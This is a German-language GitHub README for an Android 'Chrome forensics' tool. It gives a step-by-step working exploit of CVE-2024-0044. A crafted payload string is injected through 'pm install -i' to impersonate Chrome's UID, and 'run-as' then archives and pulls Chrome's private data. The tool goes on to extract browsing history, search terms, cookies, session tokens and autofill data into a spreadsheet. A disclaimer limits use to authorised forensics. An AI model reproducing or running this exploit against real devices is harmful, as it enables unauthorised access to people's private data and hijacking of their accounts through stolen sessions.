
Ein robustes digitales Forensik-Tool zur Extraktion und Analyse von Google Chrome-Artefakten von Android-Geräten.
Ein robustes digitales Forensik-Tool zum Extrahieren und Analysieren von Google-Chrome-Artefakten von Android-Geräten
Funktionen • Installation • Nutzung • Dokumentation
Autor: JackTekno
GitHub: github.com/JackTekno
Dieses Tool nutzt die CVE-2024-0044 (Run-as)-Sicherheitslücke, um Berechtigungsbeschränkungen auf nicht gerooteten Android 12/13-Geräten zu umgehen und eine forensische Extraktion von Google-Chrome-Daten zu ermöglichen. Das Tool analysiert rohe SQLite-Datenbanken und erstellt umfassende Analyseberichte.

Vollständiger forensischer Analyseworkflow von der Erfassung bis zur Berichterstattung
Das Tool erstellt einen umfassenden Excel-Bericht (result_chrome_forensic.xlsx) mit den folgenden Blättern:
F-Droid.apk)Repository klonen
git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
cd Chrome-Forensic_CVE-2024-0044
Abhängigkeiten installieren
pip install -r requirements.txt
# Push a dummy APK to temporary folder
adb push F-Droid.apk /data/local/tmp/base.apk
adb shell pm list packages -U | grep com.android.chrome
# Output example: package:com.android.chrome uid:10129
# Note the UID (e.g., 10129)
⚠️ Ersetzen Sie
10129durch Ihre tatsächliche Chrome-UID aus Schritt 3
adb shell
# Inside ADB Shell:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
# Trigger the package manager
pm install -i "$PAYLOAD" /data/local/tmp/base.apk
# Still inside ADB Shell
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar
# Exit ADB Shell
exit
adb pull /data/local/tmp/chrome.tar .
Entpacken Sie die Datei chrome.tar im Projektordner. Sie müssen Dateien nicht manuell verschieben. Das Python-Skript findet die Datenbankdateien automatisch in den entpackten Ordnern.
tar -xf chrome.tar
Führen Sie das forensische Analysetool aus:
python3 chrome_forensic.py
Das Tool analysiert die Datenbankdateien und erzeugt result_chrome_forensic.xlsx im selben Verzeichnis.
⚠️ WICHTIG: Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte forensische Analysen bestimmt.
- Verwenden Sie es nur auf Geräten, die Ihnen gehören oder für deren Analyse Sie eine ausdrückliche schriftliche Genehmigung haben.
- Unautorisierter Zugriff auf digitale Geräte kann gegen Gesetze in Ihrem Land verstoßen.
- Die Autoren übernehmen keine Haftung für Missbrauch dieses Tools.
Beiträge sind willkommen! Bitte zögern Sie nicht, einen Pull-Request zu stellen.
Dieses Projekt ist unter der GNU General Public License v3.0 lizenziert. Siehe die Datei LICENSE für Details.
Der Proof of Concept für die Erfassungsmethode wurde von Tinyhack.com zusammengefasst und geteilt.
Mit ❤️ gemacht von JackTekno
⭐ Stern auf dieses Repository • 🐛 Fehler melden • 💡 Funktion anfordern
| Blattname | Beschreibung |
|---|
| 📖 Browsing History | Detaillierte Zeitleiste besuchter URLs |
| 📈 Analytics – Top Sites | Statistisches Ranking der am häufigsten besuchten Domains |
| ⚠️ ALERTS – Suspicious | Automatisch markierte URLs (Hacking, Drogen, Erwachseneninhalte) |
| 📥 Downloads | Download-Verlauf mit Pfaden und Dateigrößen |
| 🔍 Search Terms | Suchanfragen des Benutzers aus Omnibox/Google |
| 🍪 Cookies & Sessions | Sitzungstokens und Cookie-Metadaten (hexverschlüsselt) |
| ✍️ Autofill Data | Gespeicherte Formulardaten (Namen, Adressen usw.) |